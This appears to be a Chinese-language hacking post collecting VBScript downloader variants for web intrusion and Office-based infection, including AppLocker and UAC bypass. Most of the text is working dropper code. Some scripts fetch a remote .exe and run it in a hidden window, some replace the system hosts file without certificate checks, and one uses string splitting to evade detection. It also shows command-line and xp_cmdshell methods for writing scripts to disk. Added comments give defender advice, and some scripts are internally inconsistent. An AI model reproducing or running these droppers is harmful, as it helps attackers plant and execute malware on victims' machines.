簡易 vbs downloader

Nalyd 15天前 51

vbs downloader 用途

1. 手動上傳

通常是 web hacking,必要時搭配 upload bypass 手法繞過

2. 自動化感染

通常是搭配 office 類型檔案
- 第一隻 vbs 需具備檢測是否能對外上網
- 搭配 applocker bypass (for APT)

- 搭配 UAC bypass

- 下載第二隻 vbs,用於下載與執行真正的 .exe

- 刪除相關檔案

' Fetches url with a synchronous HTTP GET and writes the raw response body
' to target through a binary ADODB stream.
' Defender note: a script host (wscript/cscript) instantiating an XMLHTTP
' object together with Adodb.Stream and then saving a file is the behaviour
' to monitor for; the individual objects are legitimate on their own.
Sub download(url,target)
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2 ' declared but not passed to SaveToFile below
Dim http,ado
Set http = CreateObject("Msxml2.XMLHTTP")
http.open "GET",url,False ' third argument False = synchronous request
http.send
' http.Status is never inspected: whatever body the server returns is written.
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile target
ado.Close
End Sub
' Example call with a placeholder host; the target has no directory component.
download "http://demo.site/demo.file","demo.file"


' Fetches url with Msxml2.ServerXMLHTTP and overwrites target with the
' response body (binary stream, overwrite flag passed to SaveToFile).
Sub download(url,target)
Const adTypeBinary = 1
Const adTypeText = 2 ' unused in this Sub
Const adSaveCreateOverWrite = 2
Dim http,ado
Set http = CreateObject("Msxml2.ServerXMLHTTP")
' Option 2 with value 13056 tells ServerXMLHTTP to ignore server certificate
' errors, so the HTTPS download below is not authenticated: anyone able to
' intercept the connection can substitute the content.
http.SetOption 2,13056
http.open "GET",url,False
http.send
' No status check: the body is saved regardless of the HTTP result.
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile target,adSaveCreateOverWrite
ado.Close
End Sub
' Resolve %WinDir% and build the path of the system hosts file.
Set WshShell=CreateObject("WScript.Shell")
WinDir =WshShell.ExpandEnvironmentStrings("%WinDir%")
HostsFile = WinDir & "\System32\Drivers\etc\Hosts"
Const hosts="https://smarthosts.googlecode.com/svn/trunk/hosts"
' Defender note: this replaces the machine's hosts file with remote content
' fetched without certificate validation, i.e. name resolution for the whole
' host is handed to whoever controls (or intercepts) that URL. Writes to the
' hosts file by a script host are worth file-integrity monitoring.
download hosts,HostsFile 'download hosts to the path held in HostsFile


'One-liner
'The key part is:
'NOTE(review): the command below appends a single-line VBScript to c:\d.vbs.
'The ProgIDs are assembled with "+" so the literal strings "adodb.stream" and
'"microsoft.xmlhttp" never appear on the command line; detections that match
'on those literals will miss it, while behaviour-based ones (cmd.exe
'redirecting echo output into a .vbs file, then a script host fetching a URL
'and saving a file) are unaffected.
echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open ^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> c:\d.vbs


' Flat script: downloads a hard-coded URL (placeholder host) and saves it as
' c:/dc.exe. Nothing in these lines runs the saved file.
' Defender note: an executable written to the root of C: by a script host is
' a high-signal file-creation event.
Set xPost = CreateObject("Microsoft.XMLHTTP")  
xPost.Open "GET","http://www.xx.com/dc.exe",0
xPost.Send()  
' The response status is not checked before the body is written.
Set sGet = CreateObject("ADODB.Stream")  
' Mode 3 = read/write, Type 1 = binary.
sGet.Mode = 3  
sGet.Type = 1  
sGet.Open()  
sGet.Write(xPost.responseBody)  
' Second argument 2 = overwrite an existing file.
sGet.SaveToFile "c:/dc.exe",2


' Flat script: downloads http://IP/test.exe ("IP" is a placeholder) and saves
' it as c:\z.exe, overwriting any existing file.
Set Post = CreateObject("Msxml2.XMLHTTP")  
' Shell is created here but not used in the lines shown.
Set Shell = CreateObject("Wscript.Shell")  
Post.Open "GET","http://IP/test.exe",0  
Post.Send()  
' The response status is not checked before the body is written.
Set aGet = CreateObject("ADODB.Stream")  
' Mode 3 = read/write, Type 1 = binary.
aGet.Mode = 3  
aGet.Type = 1  
aGet.Open()  
aGet.Write(Post.responseBody)  
aGet.SaveToFile "c:\z.exe",2


' Flat script: argument 0 is the remote URL, argument 1 the local path.
' Both are lower-cased with LCase before use.
' Defender note: because URL and destination arrive as arguments, they are
' visible in process-creation logs that record the cscript command line.
iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
' The response status is not checked before the body is written.
Set sGet = CreateObject("ADODB.Stream")
' Mode 3 = read/write, Type 1 = binary.
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
' Second argument 2 = overwrite an existing file.
sGet.SaveToFile iLocal,2
'save to file.vbs
'cscript c://file.vbs http://IP/file.exe c://file.exe


' Flat script: like the two-argument variant, plus optional user name
' (argument 2) and password (argument 3) passed to XMLHTTP.Open.
' "on error resume next" suppresses every runtime error for the rest of the
' script, so failed downloads or writes leave no visible error.
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
' NOTE(review): presumably relies on the error suppression above when these
' arguments are absent, leaving iUser/iPass unset - confirm.
' LCase also lower-cases the credentials.
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XMLHTTP")
if iUser="" and iPass="" then
xPost.Open "GET",iRemote,0
else
' Defender note: credentials given this way appear in clear text on the
' cscript command line and therefore in process-creation logs.
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
' Mode 3 = read/write, Type 1 = binary.
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile iLocal,2
'save to file.vbs
'cscript file.vbs http://demo/file.exe


' Flat script: download, save and run in one file. As pasted it is
' internally inconsistent (see the notes below) and its opening lines are
' repeated at the end.
' All runtime errors are suppressed from here on.
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
' tian6 is never assigned in the visible lines; assuming no Option Explicit it
' is Empty, so the ProgID concatenates to "Microsoft.XMLHTTP". Splitting the
' string this way keeps the full ProgID literal out of the script text, which
' defeats naive string matching but not behavioural detection.
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
if iUser="" and iPass="" then
' This branch ignores iRemote and uses a hard-coded placeholder URL.
xPost.Open "GET","http://demo/file.exe",0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
' Mode 3 = read/write, Type 1 = binary.
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
' iLocal is ignored; the body is always written to C:\file.exe (overwrite).
sGet.SaveToFile "C:\file.exe",2
Set objShell = CreateObject("Wscript.Shell")
' Runs a different path from the one just saved; window style 0 hides the
' window. Defender note: a script host spawning an .exe with a hidden window
' shortly after a file write is the parent/child pattern to alert on.
objShell.Run "C:\Baidusd_OnlineSetup_sid_30084_silent.exe", 0
Wscript.Sleep 1000 'delay
' The lines below repeat the start of the script and do nothing further.
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")
'save to file.vbs
'cscript c:\file.vbs


' Fetches url with a synchronous HTTP GET and writes the response body to
' target through a binary ADODB stream, with all runtime errors suppressed.
Sub download(url,target)
' Errors inside this Sub are swallowed: a failed request or write is silent.
On Error Resume next
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2 ' declared but not passed to SaveToFile below
Dim http,ado
Set http = CreateObject("Msxml2.XMLHTTP")
http.open "GET",url,False
http.send
' http.Status is never inspected before the body is written.
Set ado = createobject("Adodb.Stream")
ado.Type = adTypeBinary
ado.Open
ado.Write http.responseBody
ado.SaveToFile target
ado.Close
End Sub
' Example call with a placeholder host; the target has no directory component.
download "http://demo/file","file"


' Fetches url with Msxml2.ServerXMLHTTP (certificate errors ignored) and
' overwrites target with the response body.
Sub download(url,target)
        Const adTypeBinary = 1          'binary data type
        Const adTypeText = 2            'text data type
        Const adSaveCreateOverWrite = 2 'overwrite an existing file
        Dim http,ado
    Set http = CreateObject("Msxml2.ServerXMLHTTP") 'downloads the data
        ' With certificate errors ignored, the HTTPS transfer below gives no
        ' assurance about who served the content.
        http.SetOption 2,13056                      'ignore https errors
        http.open "GET",url,False
        http.send
    Set ado = createobject("Adodb.Stream")
        ado.Type = adTypeBinary
        ado.Open
        ado.Write http.responseBody
        ado.SaveToFile target,adSaveCreateOverWrite 'save
        ado.Close
End Sub
Set WshShell=CreateObject("WScript.Shell") 'create the WshShell object to use Windows shell functions
WinDir =WshShell.ExpandEnvironmentStrings("%WinDir%") 'environment variable
HostsFile = WinDir & "\System32\Drivers\etc\hosts"
Const hosts="https://raw.githubusercontent.com/hpp38122/h/master/Drive"
' Defender note: the system hosts file is replaced with content from a
' third-party repository, fetched without certificate validation; whoever
' controls or intercepts that URL decides how this machine resolves names.
download hosts,HostsFile                    'download the hosts file and save it at HostsFile
wshshell.run "cmd /c ipconfig /flushdns",0  'flush the DNS cache (window style 0 = hidden)
MsgBox "hosts 数据已更新", vbInformation, "h"


' Flat script: downloads a hard-coded URL (placeholder host) to file.exe and
' then launches file.exe.
strFileURL = "http://demo/file.exe"
strHDLocation = "file.exe"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
' Only an HTTP 200 response is written to disk.
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
' Rewind the stream before saving.
objADOStream.Position = 0   
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
Set objShell = CreateObject("WScript.Shell")
' The Exec call sits outside the If block, so it is attempted whether or not
' the download happened. Defender note: wscript/cscript as the parent of a
' freshly written .exe is the process-lineage pattern to alert on.
objShell.Exec("file.exe")


echo 寫入法,一次寫入一行

rem Builds downloader.vbs one line at a time: ">" creates/truncates the file,
rem ">>" appends. "your code-N" are placeholders for script lines.
rem Defender note: every line is a separate cmd.exe echo redirected into a
rem .vbs file, so the whole script can be reconstructed from process-creation
rem logs with command-line capture (Windows Security 4688, Sysmon Event ID 1),
rem and the file write appears in file-creation telemetry (Sysmon Event ID 11).
echo your code-1 > downloader.vbs

echo your code-2 >> downloader.vbs


rem Launch step as given by the author.
cmd.exe downloader.vbs


一次寫入兼執行

rem Write-and-run in a single cmd.exe invocation: the echo commands and the
rem cscript.exe call are chained with "&".
rem Defender note: a single command line that both redirects echo output into
rem a .vbs file and invokes cscript.exe is rarely legitimate and is a good
rem candidate for a command-line detection rule.
cmd.exe /c "@echo your code>poc.vbs&@echo your code>>file.vbs&cscript.exe file.vbs"


xp_cmdshell寫入法

-- Same echo-append technique, issued through SQL Server's xp_cmdshell, which
-- runs the string as an operating-system command in the security context of
-- the SQL Server service account (or the configured proxy account).
-- Defender note: xp_cmdshell is disabled by default; keep it disabled, alert
-- on sp_configure changes that enable it, and treat cmd.exe spawned by the
-- SQL Server process as a high-priority event.
exec ..xp_cmdshell 'echo your code-1 >d://SQLDATA//file.vbs'

exec ..xp_cmdshell 'echo your code-2 >>d://SQLDATA//file.vbs'

